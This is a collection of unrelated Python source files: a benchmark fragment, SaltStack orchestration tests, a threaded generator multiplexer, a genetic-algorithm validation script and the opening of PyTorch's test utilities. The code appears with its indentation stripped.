t0 = time.time()
for i in rr():
exec (code, locals())
assert (v == 1)
print_timed_entry('compile+exec', N, t0)
# print "\tExec : FOR N: %d => %.2f" % (N, time.time() - t0)
print("############ Class property default access")
class BBBB(object):
x = 1
def __init__(self):
self.y = 2
o = BBBB()
t0 = time.time()
for i in rr():
v = o.x
assert (v == 1)
print_timed_entry('Direct on class level', N, t0)
# print "\tProperty (default) on class: FOR N: %d => %.2f" % (N, time.time() - t0)
t0 = time.time()
for i in rr():
v = o.y
assert (v == 2)
print_timed_entry('Direct on instance', N, t0)
# print "\tRaw (direct): FOR N: %d => %.2f" % (N, time.time() - t0)
print("Hasattr a value on class?", hasattr(o, 'x'), "and on dict?", 'x' in o.__dict__)
print("Getattr a value on a class?", getattr(o, 'x'))
def bench_sharedctypes():
N = 100000
NB_PROC = 2
elements = []
t0 = time.time()
for i in xrange(N):
elements.append(Value(c_bool, False, lock=False))
t1 = time.time()
creation_time = (t1 - t0)
print("Shared types Bool : Create: %.2f (%d/s)" % (creation_time, N / creation_time))
M = 200
t2 = time.time()
for j in xrange(M):
for i in xrange(N):
elements[i].value = True
t3 = time.time()
set_time = t3 - t2
print("Shared types Bool: Linear set: %.2f (%d/s)" % (set_time, N * M / set_time))
from multiprocessing import Process
def set_massive(process_id, lst, nb_loop):
print("PROCESS %d (nb_loop:%s)" % (process_id, nb_loop))
k = 0
for j in xrange(int(nb_loop)):
for cvalue in lst:
k += 1
cvalue.value = True
print("PROCESS %d finish (%d operations)" % (process_id, k))
all_process = []
for process_id in xrange(NB_PROC):
p = Process(target=set_massive, args=(process_id, elements, M / NB_PROC))
all_process.append(p)
t0 = time.time()
for p in all_process:
p.start()
for p in all_process:
p.join()
t1 = time.time()
process_time = t1 - t0
print("Shared types Bool: // set: %.2f (%d/s)" % (process_time, N * M / process_time))
share_memory_mapping()
bench_getattr_hasattr()
bench_host_creation_with_attr()
bench_sharedctypes()
|
test_state.py
|
# -*- coding: utf-8 -*-
"""
Tests for the state runner
"""
from __future__ import absolute_import, print_function, unicode_literals
import errno
import logging
import os
import shutil
import signal
import tempfile
import textwrap
import threading
import time
import salt.exceptions
import salt.utils.event
import salt.utils.files
import salt.utils.json
import salt.utils.platform
import salt.utils.stringutils
import salt.utils.yaml
from salt.ext import six
from salt.ext.six.moves import queue
from tests.support.case import ShellCase
from tests.support.helpers import expensiveTest, flaky
from tests.support.mock import MagicMock, patch
from tests.support.runtests import RUNTIME_VARS
from tests.support.unit import skipIf
log = logging.getLogger(__name__)
@flaky
class StateRunnerTest(ShellCase):
"""
Test the state runner.
"""
RUN_TIMEOUT = 300
def add_to_queue(self, q, cmd):
"""
helper method to add salt-run
return data to a queue
"""
ret = self.run_run(cmd)
q.put(ret)
q.task_done()
@skipIf(True, "SLOWTEST skip")
def test_orchestrate_output(self):
"""
Ensure the orchestrate runner outputs useful state data.
In Issue #31330, the output only contains ['outputter:', ' highstate'],
        and not the full stateful return. This test ensures we don't regress in that
manner again.
Also test against some sample "good" output that would be included in a correct
orchestrate run.
"""
ret_output = self.run_run("state.orchestrate orch.simple")
bad_out = ["outputter:", " highstate"]
good_out = [
" Function: salt.state",
" Result: True",
"Succeeded: 1 (changed=1)",
"Failed: 0",
"Total states run: 1",
]
# First, check that we don't have the "bad" output that was displaying in
# Issue #31330 where only the highstate outputter was listed
assert bad_out != ret_output
# Now test that some expected good sample output is present in the return.
for item in good_out:
assert item in ret_output
@skipIf(True, "SLOWTEST skip")
def test_orchestrate_nested(self):
"""
test salt-run state.orchestrate and failhard with nested orchestration
"""
if os.path.exists("/tmp/ewu-2016-12-13"):
os.remove("/tmp/ewu-2016-12-13")
_, code = self.run_run("state.orchestrate nested-orch.outer", with_retcode=True)
assert os.path.exists("/tmp/ewu-2016-12-13") is False
assert code != 0
@skipIf(True, "SLOWTEST skip")
def test_orchestrate_with_mine(self):
"""
test salt-run state.orchestrate with mine.get call in sls
"""
fail_time = time.time() + 120
self.run_run('mine.update "*"')
exp_ret = "Succeeded: 1 (changed=1)"
while True:
ret = self.run_run("state.orchestrate orch.mine")
try:
assert exp_ret in ret
break
except AssertionError:
if time.time() > fail_time:
self.fail(
'"{0}" was not found in the orchestration call'.format(exp_ret)
)
@skipIf(True, "SLOWTEST skip")
def test_orchestrate_state_and_function_failure(self):
"""
Ensure that returns from failed minions are in the changes dict where
        they belong, so they can be programmatically analyzed.
See https://github.com/saltstack/salt/issues/43204
"""
self.run_run("saltutil.sync_modules")
ret = salt.utils.json.loads(
"\n".join(self.run_run("state.orchestrate orch.issue43204 --out=json"))
)
# Drill down to the changes dict
state_ret = ret["data"]["master"]["salt_|-Step01_|-Step01_|-state"]["changes"]
func_ret = ret["data"]["master"][
"salt_|-Step02_|-runtests_helpers.nonzero_retcode_return_false_|-function"
]["changes"]
# Remove duration and start time from the results, since they would
# vary with each run and that would make it impossible to test.
for item in ("duration", "start_time"):
state_ret["ret"]["minion"][
"test_|-test fail with changes_|-test fail with changes_|-fail_with_changes"
].pop(item)
self.assertEqual(
state_ret,
{
"out": "highstate",
"ret": {
"minion": {
"test_|-test fail with changes_|-test fail with changes_|-fail_with_changes": {
"__id__": "test fail with changes",
"__run_num__": 0,
"__sls__": "orch.issue43204.fail_with_changes",
"changes": {
"testing": {
"new": "Something pretended to change",
"old": "Unchanged",
}
},
"comment": "Failure!",
"name": "test fail with changes",
"result": False,
}
}
},
},
)
self.assertEqual(func_ret, {"out": "highstate", "ret": {"minion": False}})
@skipIf(True, "SLOWTEST skip")
def test_orchestrate_target_exists(self):
"""
test orchestration when target exists
while using multiple states
"""
ret = self.run_run("state.orchestrate orch.target-exists")
first = [" ID: core", " Function: salt.state", " Result: True"]
second = [
" ID: test-state",
" Function: salt.state",
" Result: True",
]
third = [
" ID: cmd.run",
" Function: salt.function",
" Result: True",
]
ret_out = [first, second, third]
for out in ret_out:
for item in out:
assert item in ret
@skipIf(True, "SLOWTEST skip")
def test_orchestrate_retcode(self):
"""
Test orchestration with nonzero retcode set in __context__
"""
self.run_run("saltutil.sync_runners")
self.run_run("saltutil.sync_wheel")
ret = "\n".join(self.run_run("state.orchestrate orch.retcode"))
for result in (
" ID: test_runner_success\n"
" Function: salt.runner\n"
" Name: runtests_helpers.success\n"
" Result: True",
" ID: test_runner_failure\n"
" Function: salt.runner\n"
" Name: runtests_helpers.failure\n"
" Result: False",
" ID: test_wheel_success\n"
" Function: salt.wheel\n"
" Name: runtests_helpers.success\n"
" Result: True",
" ID: test_wheel_failure\n"
" Function: salt.wheel\n"
" Name: runtests_helpers.failure\n"
" Result: False",
):
self.assertIn(result, ret)
@skipIf(True, "SLOWTEST skip")
def test_orchestrate_target_does_not_exist(self):
"""
test orchestration when target doesn't exist
while using multiple states
"""
ret = self.run_run("state.orchestrate orch.target-does-not-exist")
first = [
"No minions matched the target. No command was sent, no jid was assigned.",
" ID: core",
" Function: salt.state",
" Result: False",
]
second = [
" ID: test-state",
" Function: salt.state",
" Result: True",
]
third = [
" ID: cmd.run",
" Function: salt.function",
" Result: True",
]
ret_out = [first, second, third]
for out in ret_out:
for item in out:
assert item in ret
@skipIf(True, "SLOWTEST skip")
def test_orchestrate_batch_with_failhard_error(self):
"""
test orchestration properly stops with failhard and batch.
"""
ret = self.run_run("state.orchestrate orch.batch --out=json -l critical")
ret_json = salt.utils.json.loads("\n".join(ret))
retcode = ret_json["retcode"]
result = ret_json["data"]["master"][
"salt_|-call_fail_state_|-call_fail_state_|-state"
]["result"]
changes = ret_json["data"]["master"][
"salt_|-call_fail_state_|-call_fail_state_|-state"
]["changes"]
        # Looks like there are platform differences in execution.
        # I see an empty changes dict on macOS for some reason. Maybe it's a bug?
if changes:
changes_ret = changes["ret"]
# Debug
print("Retcode: {}".format(retcode))
print("Changes: {}".format(changes))
print("Result: {}".format(result))
assert retcode != 0
assert result is False
if changes:
# The execution should stop after first error, so return dict should contain only one minion
assert len(changes_ret) == 1
@skipIf(True, "SLOWTEST skip")
def test_state_event(self):
"""
test to ensure state.event
runner returns correct data
"""
q = queue.Queue(maxsize=0)
cmd = "state.event salt/job/*/new count=1"
expect = '"minions": ["minion"]'
server_thread = threading.Thread(target=self.add_to_queue, args=(q, cmd))
        server_thread.daemon = True
server_thread.start()
while q.empty():
self.run_salt("minion test.ping --static")
out = q.get()
assert expect in six.text_type(out)
server_thread.join()
@skipIf(True, "SLOWTEST skip")
def test_orchestrate_subset(self):
"""
test orchestration state using subset
"""
ret = self.run_run("state.orchestrate orch.subset", timeout=500)
def count(thing, listobj):
return sum([obj.strip() == thing for obj in listobj])
assert count("ID: test subset", ret) == 1
assert count("Succeeded: 1", ret) == 1
assert count("Failed: 0", ret) == 1
@skipIf(True, "SLOWTEST skip")
def test_orchestrate_salt_function_return_false_failure(self):
"""
Ensure that functions that only return False in the return
are flagged as failed when run as orchestrations.
See https://github.com/saltstack/salt/issues/30367
"""
self.run_run("saltutil.sync_modules")
ret = salt.utils.json.loads(
"\n".join(self.run_run("state.orchestrate orch.issue30367 --out=json"))
)
# Drill down to the changes dict
state_result = ret["data"]["master"][
"salt_|-deploy_check_|-test.false_|-function"
]["result"]
func_ret = ret["data"]["master"]["salt_|-deploy_check_|-test.false_|-function"][
"changes"
]
assert state_result is False
self.assertEqual(func_ret, {"out": "highstate", "ret": {"minion": False}})
@skipIf(salt.utils.platform.is_windows(), "*NIX-only test")
@flaky
class OrchEventTest(ShellCase):
"""
Tests for orchestration events
"""
RUN_TIMEOUT = 300
def setUp(self):
self.timeout = 60
self.master_d_dir = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "master.d")
try:
os.makedirs(self.master_d_dir)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
self.conf = tempfile.NamedTemporaryFile(
mode="w", suffix=".conf", dir=self.master_d_dir, delete=True,
)
self.base_env = tempfile.mkdtemp(dir=RUNTIME_VARS.TMP)
self.addCleanup(shutil.rmtree, self.base_env)
self.addCleanup(self.conf.close)
for attr in ("timeout", "master_d_dir", "conf", "base_env"):
self.addCleanup(delattr, self, attr)
# Force a reload of the configuration now that our temp config file has
# been removed.
self.addCleanup(self.run_run_plus, "test.arg")
def alarm_handler(self, signal, frame):
raise Exception("Timeout of {0} seconds reached".format(self.timeout))
def write_conf(self, data):
"""
Dump the config dict to the conf file
"""
self.conf.write(salt.utils.yaml.safe_dump(data, default_flow_style=False))
self.conf.flush()
@expensiveTest
def test_jid_in_ret_event(self):
"""
Test to confirm that the ret event for the orchestration contains the
jid for the jobs spawned.
"""
self.write_conf(
{"fileserver_backend": ["roots"], "file_roots": {"base": [self.base_env]}}
)
state_sls = os.path.join(self.base_env, "test_state.sls")
with salt.utils.files.fopen(state_sls, "w") as fp_:
fp_.write(
salt.utils.stringutils.to_str(
textwrap.dedent(
"""
date:
cmd.run
"""
)
)
)
orch_sls = os.path.join(self.base_env, "test_orch.sls")
with salt.utils.files.fopen(orch_sls, "w") as fp_:
fp_.write(
salt.utils.stringutils.to_str(
textwrap.dedent(
"""
date_cmd:
salt.state:
- tgt: minion
- sls: test_state
ping_minion:
salt.function:
- name: test.ping
- tgt: minion
fileserver.file_list:
salt.runner
config.values:
salt.wheel
"""
)
)
)
listener = salt.utils.event.get_event(
"master",
sock_dir=self.master_opts["sock_dir"],
transport=self.master_opts["transport"],
opts=self.master_opts,
)
jid = self.run_run_plus("state.orchestrate", "test_orch").get("jid")
if jid is None:
raise Exception("jid missing from run_run_plus output")
signal.signal(signal.SIGALRM, self.alarm_handler)
signal.alarm(self.timeout)
try:
while True:
event = listener.get_event(full=True)
if event is None:
continue
if event["tag"] == "salt/run/{0}/ret".format(jid):
# Don't wrap this in a try/except. We want to know if the
# data structure is different from what we expect!
ret = event["data"]["return"]["data"]["master"]
for job in ret:
self.assertTrue("__jid__" in ret[job])
break
finally:
del listener
signal.alarm(0)
@expensiveTest
def test_parallel_orchestrations(self):
"""
        Test to confirm that the parallel state requisite works in orch.
        We do this by running several 10 second test.sleep states in parallel
        and ensuring the total runtime is far less than it would be if run serially.
"""
self.write_conf(
{"fileserver_backend": ["roots"], "file_roots": {"base": [self.base_env]}}
)
orch_sls = os.path.join(self.base_env, "test_par_orch.sls")
with salt.utils.files.fopen(orch_sls, "w") as fp_:
fp_.write(
textwrap.dedent(
"""
{% for count in range(1, 20) %}
sleep {{ count }}:
module.run:
- name: test.sleep
- length: 10
- parallel: True
{% endfor %}
sleep 21:
module.run:
- name: test.sleep
- length: 10
- parallel: True
- require:
- module: sleep 1
"""
)
)
orch_sls = os.path.join(self.base_env, "test_par_orch.sls")
listener = salt.utils.event.get_event(
"master",
sock_dir=self.master_opts["sock_dir"],
transport=self.master_opts["transport"],
opts=self.master_opts,
)
start_time = time.time()
jid = self.run_run_plus("state.orchestrate", "test_par_orch").get("jid")
if jid is None:
raise Exception("jid missing from run_run_plus output")
signal.signal(signal.SIGALRM, self.alarm_handler)
signal.alarm(self.timeout)
received = False
try:
while True:
event = listener.get_event(full=True)
if event is None:
continue
# if we receive the ret for this job before self.timeout (60),
# the test is implicitly successful; if it were happening in serial it would be
                # at least 110 seconds.
if event["tag"] == "salt/run/{0}/ret".format(jid):
received = True
# Don't wrap this in a try/except. We want to know if the
# data structure is different from what we expect!
ret = event["data"]["return"]["data"]["master"]
for state in ret:
data = ret[state]
# we expect each duration to be greater than 10s
self.assertTrue(data["duration"] > 10000)
break
                # also confirm that the total runtime is roughly 30s (leaving 10s of buffer)
self.assertTrue((time.time() - start_time) < 40)
finally:
self.assertTrue(received)
del listener
signal.alarm(0)
@expensiveTest
def test_orchestration_soft_kill(self):
"""
        Test to confirm that state.soft_kill prevents the targeted stage
        (stage_two) from running in a subsequent orchestration.
"""
self.write_conf(
{"fileserver_backend": ["roots"], "file_roots": {"base": [self.base_env]}}
)
orch_sls = os.path.join(self.base_env, "two_stage_orch_kill.sls")
with salt.utils.files.fopen(orch_sls, "w") as fp_:
fp_.write(
textwrap.dedent(
"""
stage_one:
test.succeed_without_changes
stage_two:
test.fail_without_changes
"""
)
)
listener = salt.utils.event.get_event(
"master",
sock_dir=self.master_opts["sock_dir"],
transport=self.master_opts["transport"],
opts=self.master_opts,
)
mock_jid = "20131219120000000000"
self.run_run("state.soft_kill {0} stage_two".format(mock_jid))
with patch("salt.utils.jid.gen_jid", MagicMock(return_value=mock_jid)):
jid = self.run_run_plus("state.orchestrate", "two_stage_orch_kill").get(
"jid"
)
if jid is None:
raise Exception("jid missing from run_run_plus output")
signal.signal(signal.SIGALRM, self.alarm_handler)
signal.alarm(self.timeout)
received = False
try:
while True:
event = listener.get_event(full=True)
if event is None:
continue
# Ensure that stage_two of the state does not run
if event["tag"] == "salt/run/{0}/ret".format(jid):
received = True
# Don't wrap this in a try/except. We want to know if the
# data structure is different from what we expect!
ret = event["data"]["return"]["data"]["master"]
self.assertNotIn(
"test_|-stage_two_|-stage_two_|-fail_without_changes", ret
)
break
finally:
self.assertTrue(received)
del listener
signal.alarm(0)
@skipIf(True, "SLOWTEST skip")
def test_orchestration_with_pillar_dot_items(self):
"""
        Test to confirm that when a state file includes other state files, and
        one of those files uses pillar-related functions that do not pull from
        the pillar cache, all of the state files remain available and the
        file_roots setting is preserved. See issues #48277 and #46986.
"""
self.write_conf(
{"fileserver_backend": ["roots"], "file_roots": {"base": [self.base_env]}}
)
orch_sls = os.path.join(self.base_env, "main.sls")
with salt.utils.files.fopen(orch_sls, "w") as fp_:
fp_.write(
textwrap.dedent(
"""
include:
- one
- two
- three
"""
)
)
orch_sls = os.path.join(self.base_env, "one.sls")
with salt.utils.files.fopen(orch_sls, "w") as fp_:
fp_.write(
textwrap.dedent(
"""
{%- set foo = salt['saltutil.runner']('pillar.show_pillar') %}
placeholder_one:
test.succeed_without_changes
"""
)
)
orch_sls = os.path.join(self.base_env, "two.sls")
with salt.utils.files.fopen(orch_sls, "w") as fp_:
fp_.write(
textwrap.dedent(
"""
placeholder_two:
test.succeed_without_changes
"""
)
)
orch_sls = os.path.join(self.base_env, "three.sls")
with salt.utils.files.fopen(orch_sls, "w") as fp_:
fp_.write(
textwrap.dedent(
"""
placeholder_three:
test.succeed_without_changes
"""
)
)
orch_sls = os.path.join(self.base_env, "main.sls")
listener = salt.utils.event.get_event(
"master",
sock_dir=self.master_opts["sock_dir"],
transport=self.master_opts["transport"],
opts=self.master_opts,
)
jid = self.run_run_plus("state.orchestrate", "main").get("jid")
if jid is None:
raise salt.exceptions.SaltInvocationError(
"jid missing from run_run_plus output"
)
signal.signal(signal.SIGALRM, self.alarm_handler)
signal.alarm(self.timeout)
received = False
try:
while True:
event = listener.get_event(full=True)
if event is None:
continue
if event.get("tag", "") == "salt/run/{0}/ret".format(jid):
received = True
# Don't wrap this in a try/except. We want to know if the
# data structure is different from what we expect!
ret = event["data"]["return"]["data"]["master"]
for state in ret:
data = ret[state]
# Each state should be successful
self.assertEqual(data["comment"], "Success!")
break
finally:
self.assertTrue(received)
del listener
signal.alarm(0)
@skipIf(True, "SLOWTEST skip")
def test_orchestration_onchanges_and_prereq(self):
"""
        Test onchanges and prereq requisites in orchestration: the dependent
        states should only fire when the watched state reports changes.
"""
self.write_conf(
{"fileserver_backend": ["roots"], "file_roots": {"base": [self.base_env]}}
)
orch_sls = os.path.join(self.base_env, "orch.sls")
with salt.utils.files.fopen(orch_sls, "w") as fp_:
fp_.write(
textwrap.dedent(
"""
manage_a_file:
salt.state:
- tgt: minion
- sls:
- orch.req_test
do_onchanges:
salt.function:
- tgt: minion
- name: test.ping
- onchanges:
- salt: manage_a_file
do_prereq:
salt.function:
- tgt: minion
- name: test.ping
- prereq:
- salt: manage_a_file
"""
)
)
listener = salt.utils.event.get_event(
"master",
sock_dir=self.master_opts["sock_dir"],
transport=self.master_opts["transport"],
opts=self.master_opts,
)
try:
jid1 = self.run_run_plus("state.orchestrate", "orch", test=True).get("jid")
# Run for real to create the file
self.run_run_plus("state.orchestrate", "orch").get("jid")
# Run again in test mode. Since there were no changes, the
# requisites should not fire.
jid2 = self.run_run_plus("state.orchestrate", "orch", test=True).get("jid")
finally:
try:
os.remove(os.path.join(RUNTIME_VARS.TMP, "orch.req_test"))
except OSError:
pass
assert jid1 is not None
assert jid2 is not None
tags = {"salt/run/{0}/ret".format(x): x for x in (jid1, jid2)}
ret = {}
signal.signal(signal.SIGALRM, self.alarm_handler)
signal.alarm(self.timeout)
try:
while True:
event = listener.get_event(full=True)
if event is None:
continue
if event["tag"] in tags:
ret[tags.pop(event["tag"])] = self.repack_state_returns(
event["data"]["return"]["data"]["master"]
)
if not tags:
# If tags is empty, we've grabbed all the returns we
# wanted, so let's stop listening to the event bus.
break
finally:
del listener
signal.alarm(0)
for sls_id in ("manage_a_file", "do_onchanges", "do_prereq"):
# The first time through, all three states should have a None
# result, while the second time through, they should all have a
# True result.
assert (
ret[jid1][sls_id]["result"] is None
), "result of {0} ({1}) is not None".format(
sls_id, ret[jid1][sls_id]["result"]
)
assert (
ret[jid2][sls_id]["result"] is True
), "result of {0} ({1}) is not True".format(
sls_id, ret[jid2][sls_id]["result"]
)
# The file.managed state should have shown changes in the test mode
# return data.
assert ret[jid1]["manage_a_file"]["changes"]
# After the file was created, running again in test mode should have
# shown no changes.
assert not ret[jid2]["manage_a_file"]["changes"], ret[jid2]["manage_a_file"][
"changes"
]
|
multiplexer.py
|
from __future__ import absolute_import
from threading import Thread
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty # Python 3.x
# Yield STOP from an input generator to stop the
# top-level loop without processing any more input.
STOP = object()
class Multiplexer(object):
def __init__(self, generators):
self.generators = generators
self.queue = Queue()
def loop(self):
self._init_readers()
while True:
try:
item = self.queue.get(timeout=0.1)
if item is STOP:
break
else:
yield item
except Empty:
pass
def _init_readers(self):
for generator in self.generators:
t = Thread(target=_enqueue_output, args=(generator, self.queue))
t.daemon = True
t.start()
def _enqueue_output(generator, queue):
for item in generator:
queue.put(item)
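# Illustrative usage sketch (not part of the original module): multiplex two
# finite generators onto a single consumer loop. The generator names below are
# hypothetical. Yielding STOP from one input ends the top-level loop; ordering
# is nondeterministic and items enqueued after STOP is consumed are dropped.
if __name__ == "__main__":
    def numbers():
        for n in range(3):
            yield n

    def letters():
        for ch in "ab":
            yield ch
        yield STOP

    for item in Multiplexer([numbers(), letters()]).loop():
        print(item)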
|
Example3.py
|
# -------------------------------------------------------------------- #
# This example was designed to show that the GA can produce near-optimal solutions.
# It was used as a response to reviewers of the AUTCON journal.
# -------------------------------------------------------------------- #
import time
import ast
import pandas as pd
import multiprocessing as mp
from multiprocessing import Process, Queue
import itertools
from Network.IndianaNetwork import IndianaNetwork
from LifeCycleAnalyzer.Simulators.MainSimulator import MainSimulator
from LifeCycleAnalyzer.LCA import LCA
from Optimizer.GA import GA
from Optimizer.IUC import IUC
from utils.PredictiveModels.Linear import Linear
from utils.AwesomeTimeIt import timeit
from utils.GeneralSettings import *
def lca(mrr = None):
session_name = 'Indiana'
mynetwork = IndianaNetwork("INDIANA2019",
n_assets = 1,
is_deck = False,
is_superstructure = True,
is_substructure = False)
mynetwork.load_network()
    if mrr is not None:
mynetwork.assets[0].mrr_model.set_mrr(mrr)
mynetwork.set_current_budget_limit(100000)
mynetwork.set_budget_limit_model(Linear(X0 = 100000, drift = 0))
mynetwork.set_npv_budget_limit(10000)
simulator = MainSimulator()
lca = LCA(network = mynetwork,
lca_name = session_name,
simulator = simulator,
random = False,
is_hazard = False,
n_simulations = 500)
return lca
def GA_test(obj):
optimizer = GA(obj)
optimizer.set_ga_chars(crossver_prob = 0.75,
mutation_prob = 0.1,
population_size = 50,
n_generations = 100,
n_elites = 5,
optimzition_type = 'max',
n_jobs = -1)
optimizer.optimize()
@timeit
def example():
mylca = lca()
mylca.run()
# GA_test(lca)
# ---------------------------- #
# For the parallel section #
def lca_for_validation(mrrs, q_out):
for mrr in mrrs:
session_name = 'Indiana'
mynetwork = IndianaNetwork("INDIANA2019",
n_assets = 1,
is_deck = False,
is_superstructure = True,
is_substructure = False)
mynetwork.load_network()
mynetwork.set_current_budget_limit(100000)
mynetwork.set_budget_limit_model(Linear(X0 = 100000, drift = 0))
mynetwork.set_npv_budget_limit(10000)
mynetwork.assets[0].mrr_model.set_mrr(np.atleast_2d(mrr))
simulator = MainSimulator()
lca = LCA(network = mynetwork,
lca_name = session_name,
simulator = simulator,
random = False,
is_hazard = False,
n_simulations = 1000)
lca.run()
results = lca.get_network_npv()
q_out.put(mrr + results)
def validate_ga(N = None, batch_size = 20000):
results_queue = Queue()
n_cores = mp.cpu_count()-2
genset = GenSet()
combs = list(itertools.product([0, 1], repeat = genset.n_steps * genset.dt * genset.n_elements))
if not N is None:
combs = combs[:N]
slicer = int(len(combs)/n_cores) + 1
# Creating and filling the pool
pool = []
for j in range (n_cores):
init_idx = j * slicer
last_idx = (j + 1) * slicer if j < n_cores-1 else len(combs)
worker = Process(target = lca_for_validation, args = (combs[init_idx: last_idx], results_queue,))
pool.append(worker)
print('starting processes...')
for worker in pool:
worker.start()
all_samples = []
done_workers = 0
batch_number = 0
cols = []
for elem_number in range(genset.n_elements):
for i in range (genset.dt*genset.n_steps):
cols.append(f'Eelem{elem_number}-{i}')
cols += ['UserCost', 'AgencyCost', 'Utility']
def save_batch(all_samples, cols, batch_number, batch_size = batch_size):
batch_number += 1
df = pd.DataFrame(all_samples[:batch_size], columns = cols)
df.to_csv(f"./reports/GA-Validation-{batch_number}.csv")
print (f'Batch number {batch_number} is done')
return batch_number, all_samples[batch_size:]
while any(worker.is_alive() for worker in pool):
while not results_queue.empty():
sample = results_queue.get()
            if sample is not None:
all_samples.append(sample)
if len(all_samples) > batch_size:
batch_number, all_samples = save_batch(all_samples, cols, batch_number)
print('waiting for workers to join...')
for worker in pool:
worker.join()
print('all workers are joined.\n')
if len(all_samples) > 0:
batch_number, all_samples = save_batch(all_samples, cols, batch_number)
print (f'Done')
if __name__ == "__main__":
    # example()
validate_ga()
|
common_utils.py
|
r"""Importing this file must **not** initialize CUDA context. test_distributed
relies on this assumption to properly run. This means that when this is imported
no CUDA calls shall be made, including torch.cuda.device_count(), etc.
torch.testing._internal.common_cuda.py can freely initialize CUDA context when imported.
"""
import sys
import os
import platform
import re
import gc
import types
import math
from functools import partial
import inspect
import io
import copy
import operator
import argparse
import unittest
import warnings
import random
import contextlib
import shutil
import threading
from pathlib import Path
import socket
import subprocess
import time
from collections import OrderedDict
from collections.abc import Sequence
from contextlib import contextmanager, closing
from functools import wraps
from itertools import product
from copy import deepcopy
from numbers import Number
import tempfile
import json
import __main__ # type: ignore[import]
import errno
import ctypes
from typing import cast, Any, Dict, Iterable, Iterator, Optional, Union, List
from unittest.mock import MagicMock
import numpy as np
import expecttest
from .._core import \
(_compare_tensors_internal, _compare_scalars_internal, _compare_return_type)
import torch
import torch.cuda
from torch.testing import make_tensor
from torch._utils_internal import get_writable_path
from torch._six import string_classes
from torch import Tensor
import torch.backends.cudnn
import torch.backends.mkl
from enum import Enum
from statistics import mean
import functools
torch.backends.disable_global_flags()
FILE_SCHEMA = "file://"
if sys.platform == 'win32':
FILE_SCHEMA = "file:///"
# Environment variable `IN_CI` is set in `.jenkins/common.sh`.
IS_IN_CI = os.getenv('IN_CI') == '1'
IS_SANDCASTLE = os.getenv('SANDCASTLE') == '1' or os.getenv('TW_JOB_USER') == 'sandcastle'
IS_FBCODE = os.getenv('PYTORCH_TEST_FBCODE') == '1'
IS_REMOTE_GPU = os.getenv('PYTORCH_TEST_REMOTE_GPU') == '1'
RETRY_TEST_CASES = os.getenv('PYTORCH_RETRY_TEST_CASES') == '1'
OVERRIDE_FLAKY_SIGNAL = os.getenv('PYTORCH_OVERRIDE_FLAKY_SIGNAL') == '1'
MAX_NUM_RETRIES = 3
DISABLED_TESTS_FILE = '.pytorch-disabled-tests.json'
SLOW_TESTS_FILE = '.pytorch-slow-tests.json'
slow_tests_dict: Optional[Dict[str, Any]] = None
disabled_tests_dict: Optional[Dict[str, Any]] = None
class _TestParametrizer(object):
"""
Decorator class for parametrizing a test function, yielding a set of new tests spawned
from the original generic test, each specialized for a specific set of test inputs. For
example, parametrizing a test across the set of ops will result in a test function per op.
The decision of how to parametrize / what to parametrize over is intended to be implemented
by each derived class.
    In detail, the decorator adds a 'parametrize_fn' property to the test function that is called
during device-specific test instantiation performed in instantiate_device_type_tests(). Because of this,
there is no need to parametrize over device type, as that is already handled separately.
If the decorator is applied to a test function that already has a 'parametrize_fn' property, a new
composite 'parametrize_fn' will be created that generates tests with the product of the parameters
generated by the old and new parametrize_fns. This allows for convenient composability of decorators.
Args:
handles_dtypes (bool): If True, indicates that it is the responsibility of the decorator to handle
dtypes internally. This allows for more flexibility when needed (e.g. for op-specific dtype handling).
Default: True
"""
def __init__(self, handles_dtypes=True):
self.handles_dtypes = handles_dtypes
def _parametrize_test(self, test, generic_cls, device_cls):
"""
Parametrizes the given test function across whatever dimension is specified by the derived class.
Tests can be parametrized over any arbitrary dimension or combination of dimensions, such as all
ops, all modules, or all ops + their associated dtypes.
Args:
test (fn): Test function to parametrize over
generic_cls (class): Generic test class object containing tests (e.g. TestFoo)
device_cls (class): Device-specialized test class object (e.g. TestFooCPU); set to None
if the tests are not part of a device-specific set
Returns:
Generator object returning 3-tuples of:
test (fn): Parametrized test function; must support a device arg and args for any params
test_name (str): Parametrized suffix for the test (e.g. opname_int64); will be appended to
the base name of the test
param_kwargs (dict): Param kwargs to pass to the test (e.g. {'op': 'add', 'dtype': torch.int64})
"""
raise NotImplementedError
def __call__(self, fn):
if hasattr(fn, 'parametrize_fn'):
# Do composition with the product of args.
old_parametrize_fn = fn.parametrize_fn
new_parametrize_fn = self._parametrize_test
def composite_fn(test, generic_cls, device_cls,
old_parametrize_fn=old_parametrize_fn,
new_parametrize_fn=new_parametrize_fn):
old_tests = [(test, test_name, param_kwargs) for (test, test_name, param_kwargs) in
old_parametrize_fn(test, generic_cls, device_cls)]
for (old_test, old_test_name, old_param_kwargs) in old_tests:
for (new_test, new_test_name, new_param_kwargs) in \
new_parametrize_fn(old_test, generic_cls, device_cls):
full_param_kwargs = {**old_param_kwargs, **new_param_kwargs}
yield (new_test, '{}_{}'.format(new_test_name, old_test_name), full_param_kwargs)
fn.parametrize_fn = composite_fn
old_handles_dtypes = fn.handles_dtypes if hasattr(fn, 'handles_dtypes') else False
if self.handles_dtypes and old_handles_dtypes:
raise RuntimeError('Cannot compose multiple parametrization decorators that handle dtypes; '
'their dtype handling conflicts')
fn.handles_dtypes = self.handles_dtypes or old_handles_dtypes
else:
fn.parametrize_fn = self._parametrize_test
fn.handles_dtypes = self.handles_dtypes
return fn
def instantiate_parametrized_tests(generic_cls):
"""
Instantiates tests that have been decorated with a parametrize_fn. This is generally performed by a
decorator subclass of _TestParametrizer. The generic test will be replaced on the test class by
parametrized tests with specialized names.
Args:
generic_cls (class): Generic test class object containing tests (e.g. TestFoo)
"""
for attr_name in tuple(dir(generic_cls)):
class_attr = getattr(generic_cls, attr_name)
if not hasattr(class_attr, 'parametrize_fn'):
continue
if hasattr(class_attr, 'handles_dtypes') and class_attr.handles_dtypes:
raise RuntimeError('instantiate_parametrized_tests() should not be used with decorators '
'that handle dtypes internally (e.g. @ops, @modules, etc.). Use '
'instantiate_device_type_tests() with these instead.')
# Remove the generic test from the test class.
delattr(generic_cls, attr_name)
# Add parametrized tests to the test class.
def instantiate_test_helper(cls, name, test, param_kwargs):
@wraps(test)
def instantiated_test(self, param_kwargs=param_kwargs):
test(self, **param_kwargs)
assert not hasattr(generic_cls, name), "Redefinition of test {0}".format(name)
setattr(generic_cls, name, instantiated_test)
for (test, test_suffix, param_kwargs) in class_attr.parametrize_fn(
class_attr, generic_cls=generic_cls, device_cls=None):
